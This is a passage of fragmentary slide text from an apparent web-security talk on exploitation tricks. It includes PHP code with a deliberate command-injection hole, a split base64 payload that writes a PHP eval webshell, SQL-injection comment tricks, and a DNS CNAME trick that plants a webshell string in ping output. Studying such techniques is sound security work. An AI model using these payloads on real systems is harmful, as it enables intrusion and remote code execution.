a binary vulnerability exploiting. In the vulnerability, we can control a 8 bytes string, but it must be end with "\0". I write a simple example code using PHP. <?php $param = $_REQUEST['param']; If ( strlen($param) < 8 ) { echo shell_exec($param); }
o \ PD9\ waH\ AgZ\ XZh\ bCg\ kX0\ dFV\ Fsx\ XSk\ 7|\ bas\ e64\ -\ d>\ c.p\ hp www:~$ echo PD9waHAgZXZhbCgkX0dFVFsxXSk7| base64 -d> c.php ▪ w The shortest command in Linux ▪ ls -t List directory sort by time modified ▪ A [\n] between every two filename ▪ [\] Quote the [\n] after filename ▪ So [\n] don't influence command execution ▪ Arbitrary command execution vulnerability
but we can not comment out the rest SQL statement (because of line feed). <?php $sql = "UPDATE `{$table}` SET `username`='admin' WHERE id=1"; mysqli_query($link, $sql);
] One line comments, double dash with a whitespace ▪ [/*...*/] Multiple lines comments ▪ [`] At some condition, ` is similar with comments ▫ Mysql @@version <= 5.5 ▫ Reference: https://goo.gl/633Ej7 ▪ [;] When multiple SQL statements execution support ▫ PDO ✔ ▫ Mysql ✘ ▫ Mysqli ✘
SET col_name1={expr1|DEFAULT} [, col_name2={expr2|DEFAULT}] ... [WHERE where_condition] [ORDER BY ...] [LIMIT row_count] Which statements can be put in position "table_reference"?
bytes of data. 64 bytes from 107.191.60.143.vultr.com (107.191.60.143): icmp_seq=1 ttl=64 time=0.033 ms --- leavesongs.com ping statistics --- 1 packets transmitted, 1 received, 0% packet loss, time 0ms rtt min/avg/max/mdev = 0.033/0.033/0.033/0.000 ms ▪ We can control ping's result via CNAME record! ▪ Idea: Set the CNAME record of my domain name to a webshell
data bytes 64 bytes from 107.191.60.143: icmp_seq=0 ttl=50 time=101.293 ms --- <?=eval($_post[1])?>.dddns.leavesongs.com ping statistics --- 1 packets transmitted, 1 packets received, 0.0% packet loss round-trip min/avg/max/stddev = 101.293/101.293/101.293/0.000 ms dddns.leavesongs.com ⇒ NS Record ⇒ My DNS Server aaa.dddns.leavesongs.com ⇒ <?=eval($_post[1])?>.dddns.leavesongs.com ⇒ 107.191.60.143
C + Perl ▫ 'a'++ ⇒ 'b'; 'b'++ ⇒ 'c'; 'c'++ ⇒ 'd'; ... ▫ Only digits([a-zA-Z0-9]) are supported ▫ 'z'++ ⇒ 'aa'; ▪ Thinking about: If Increment Operation would help me to solve the problem?